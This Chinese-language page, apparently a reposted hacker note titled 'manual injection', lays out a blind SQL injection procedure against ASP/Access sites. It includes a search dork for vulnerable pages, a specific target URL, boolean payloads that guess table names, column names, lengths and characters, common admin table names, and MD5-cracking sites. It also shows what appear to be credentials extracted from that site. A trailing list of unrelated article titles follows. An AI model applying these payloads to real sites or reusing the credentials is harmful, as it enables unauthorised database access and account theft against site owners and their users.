黑客注入之手工注入
来源:互联网 发布:如何注册两个淘宝账号 编辑:程序博客网 时间:2024/05/01 01:13
先找注入点
inurl:asp?id=9
http://www.hsqs.com/tipsview.asp?id=9
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
__________________
www.md5.com.cn
www.xmd5.com
www.cmd5.com
猜表名 and (select count(*) from 表名)>0
猜列名 and (select count(列名) from 表名)>0
猜长度 and (select top 1 len(username) from admin)>5
username长 4
password长 16
猜内容 and (select top 1 asc(mid(password,1,1)) from admin)>50
asc码
username 120,117
常见表段
sysadmin admin administrator manger
[username] : hsqs1
[password] : 1f60163129f50b84 yingkesong1
______________
猜表名 and (select count(*) from sysadmin)>0
猜列名 and (select count(username) from sysadmin)>0
猜长度 and (select top 1 len(username) from sysadmin)>5
猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50
asc码
username 120,117
admin
username 5
password 16
104 115
0 0
- 黑客注入之手工注入
- 手工注入之jsp篇
- 手工注入之jsp篇
- 手工注入
- 手工注入
- 手工注入
- SQL注入之手工注入sqli-labs-master
- spring依赖注入之手工装配
- DVWA之php+mysql手工注入
- SQL注入(手工注入)
- 手工检测可否注入
- 手工SQL注入教程
- JSP手工注入
- ASP+acc手工注入
- 手工注入笔记
- 手工注入摘记
- 手工SQL注入入侵
- sql手工注入
- poj 1273
- 到csnd的第一篇博客,记录一个菜鸟程序员的成长历程。
- java I/O
- Hbuilder开发app实战-识岁04-七牛云上传文件的js实现
- poj 1459
- 黑客注入之手工注入
- 例题9-11 最大面积的最小的三角剖分 UVa1331
- 数据结构之---C语言实现关键路径AOE图
- 树的共同祖先
- 5种创建UIImage的类方法
- Java开发中的23种设计模式详解(转)
- C++用多种方式实现Singleton单例模式
- atitit.javascript js 上传文件的本地预览
- std::find, std::find_if, std::find_if_not